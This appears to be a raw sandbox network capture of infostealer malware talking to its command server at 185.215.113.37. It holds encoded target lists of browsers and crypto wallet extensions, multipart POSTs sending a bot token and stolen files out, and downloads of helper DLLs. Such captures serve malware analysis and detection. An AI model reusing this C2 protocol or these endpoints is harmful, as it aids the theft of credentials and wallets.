58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 13, 2024 17:46:09.019551039 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 13, 2024 17:46:09.021107912 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJ Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 4a 2d 2d 0d 0a Data Ascii: ------CFIIIJJKJKFHIDGDBAKJContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CFIIIJJKJKFHIDGDBAKJContent-Disposition: form-data; name="message"plugins------CFIIIJJKJKFHIDGDBAKJ--
Oct 13, 2024 17:46:09.244731903 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 13, 2024 17:46:09.244919062 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 13, 2024 17:46:09.244931936 CEST	1236	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 13, 2024 17:46:09.244942904 CEST	1236	IN	Data Raw: 49 45 46 77 64 47 39 7a 49 46 64 68 62 47 78 6c 64 48 78 77 61 47 74 69 59 57 31 6c 5a 6d 6c 75 5a 32 64 74 59 57 74 6e 61 32 78 77 61 32 78 71 61 6d 31 6e 61 57 4a 76 61 47 35 69 59 58 77 78 66 44 42 38 4d 48 78 51 5a 58 52 79 59 53 42 42 63 48 Data Ascii: IEFwdG9zIFdhbGxldHxwaGtiYW1lZmluZ2dtYWtna2xwa2xqam1naWJvaG5iYXwxfDB8MHxQZXRyYSBBcHRvcyBXYWxsZXR8ZWpqbGFkaW5uY2tkZ2plbWVrZWJkcGVva2Jpa2hmY2l8MXwwfDB8TWFydGlhbiBBcHRvcyBXYWxsZXR8ZWZiZ2xnb2ZvaXBwYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWt
Oct 13, 2024 17:46:09.244954109 CEST	496	IN	Data Raw: 59 57 5a 6a 61 48 77 78 66 44 42 38 4d 48 78 4e 57 55 74 4a 66 47 4a 74 61 57 74 77 5a 32 39 6b 63 47 74 6a 62 47 35 72 5a 32 31 75 63 48 42 6f 5a 57 68 6b 5a 32 4e 70 62 57 31 70 5a 47 56 6b 66 44 46 38 4d 48 77 77 66 46 4e 77 62 47 6c 72 61 58 Data Ascii: YWZjaHwxfDB8MHxNWUtJfGJtaWtwZ29kcGtjbG5rZ21ucHBoZWhkZ2NpbW1pZGVkfDF8MHwwfFNwbGlraXR5fGpoZmpmY2xlcGFjb2xkbWpta21kbG1nYW5mYWFsa2xifDF8MHwwfENvbW1vbktleXxjaGdmZWZqcGNvYmZibnBtaW9rZmpqYWdsYWhtbmRlZHwxfDB8MHxab2hvIFZhdWx0fGlna3Bjb2RoaWVvbXBlbG9uY2Z
Oct 13, 2024 17:46:09.244960070 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 76 63 47 5a 6e 5a 57 78 74 59 32 31 69 61 57 46 71 59 57 31 6c 63 47 35 74 62 47 39 70 61 6d 4a 77 62 32 78 6c 61 57 46 74 59 58 77 78 66 44 42 38 4d 48 78 4f 61 57 64 6f 64 47 78 35 49 46 64 68 62 47 78 6c 64 48 Data Ascii: IFdhbGxldHxvcGZnZWxtY21iaWFqYW1lcG5tbG9pamJwb2xlaWFtYXwxfDB8MHxOaWdodGx5IFdhbGxldHxmaWlrb21tZGRiZWNjYW9pY29lam9uaWFtbW5hbGtmYXwxfDB8MHxFY3RvIFdhbGxldHxiZ2pvZ3BvaWRlamRlbWdvb2NocG5rbWRqcG9jZ2toYXwxfDB8MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXB
Oct 13, 2024 17:46:09.244965076 CEST	668	IN	Data Raw: 62 57 68 68 5a 6e 77 78 66 44 42 38 4d 48 78 4e 59 57 64 70 59 79 42 46 5a 47 56 75 49 46 64 68 62 47 78 6c 64 48 78 74 61 33 42 6c 5a 32 70 72 59 6d 78 72 61 32 56 6d 59 57 4e 6d 62 6d 31 72 59 57 70 6a 61 6d 31 68 59 6d 6c 71 61 47 4e 73 5a 33 Data Ascii: bWhhZnwxfDB8MHxNYWdpYyBFZGVuIFdhbGxldHxta3BlZ2prYmxra2VmYWNmbm1rYWpjam1hYmlqaGNsZ3wxfDB8MHxCYWNrcGFjayBXYWxsZXR8YWZsa21maGViZWRiamlvaXBnbGdjYmNtbmJwZ2xpb2Z8MXwwfDB8VG9ua2VlcGVyIFdhbGxldHxvbWFhYmJlZmJtaWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGV
Oct 13, 2024 17:46:09.247112036 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="message"fplugins------ECGHJJEHDHCAAKFIIDGI--
Oct 13, 2024 17:46:09.470304012 CEST	335	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:09 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 13, 2024 17:46:09.488909960 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC Host: 185.215.113.37 Content-Length: 6067 Connection: Keep-Alive Cache-Control: no-cache
Oct 13, 2024 17:46:09.488955975 CEST	6067	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 13, 2024 17:46:10.221892118 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:10.488619089 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 13, 2024 17:46:10.890001059 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:10 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 13, 2024 17:46:10.890027046 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 13, 2024 17:46:10.890047073 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 13, 2024 17:46:12.283698082 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHCBAFIDAECBGCBFHJE Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Oct 13, 2024 17:46:13.126713991 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:13.221971035 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Oct 13, 2024 17:46:13.946486950 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:13.988101006 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBGCAFIIECBFIDHIJKFBContent-Disposition: form-data; name="file"------CBGCAFIIECBFIDHIJKFB--
Oct 13, 2024 17:46:14.704907894 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:14 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:15.073513985 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAK Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 30 35 37 39 63 35 36 31 30 65 35 61 38 31 32 33 38 38 30 64 30 64 62 61 30 66 37 65 61 34 32 31 64 66 30 35 64 35 32 39 62 34 33 32 65 61 32 61 61 34 61 61 30 32 66 64 39 38 62 64 38 36 64 66 39 61 37 64 66 63 30 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 49 49 49 4a 4a 4b 4a 4b 46 48 49 44 47 44 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="token"70579c5610e5a8123880d0dba0f7ea421df05d529b432ea2aa4aa02fd98bd86df9a7dfc0------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCFIIIJJKJKFHIDGDBAKContent-Disposition: form-data; name="file"------HCFIIIJJKJKFHIDGDBAK--
Oct 13, 2024 17:46:15.798760891 CEST	202	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:15 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 13, 2024 17:46:16.061532021 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 13, 2024 17:46:16.292335033 CEST	1236	IN	HTTP/1.1 200 OK Date: Sun, 13 Oct 2024 15:46:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 